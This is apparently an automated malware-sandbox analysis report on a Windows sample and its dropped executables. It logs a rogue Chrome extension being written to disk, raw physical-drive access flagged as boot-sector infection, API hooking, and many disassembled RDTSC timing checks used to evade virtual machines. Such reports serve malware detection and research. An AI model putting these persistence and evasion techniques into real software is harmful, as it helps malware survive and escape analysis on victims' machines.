Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\popup.html	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\background.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\book.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\jquery-1.8.3.min.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\popup.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\manifest.json	Jump to behavior

Boot Survival:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\1611971443428.exe

Code function: 8_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1611971443428.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_100204C0

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC92Ah 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684CECA8Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC879h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC887h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC5C7h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	RDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C51h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
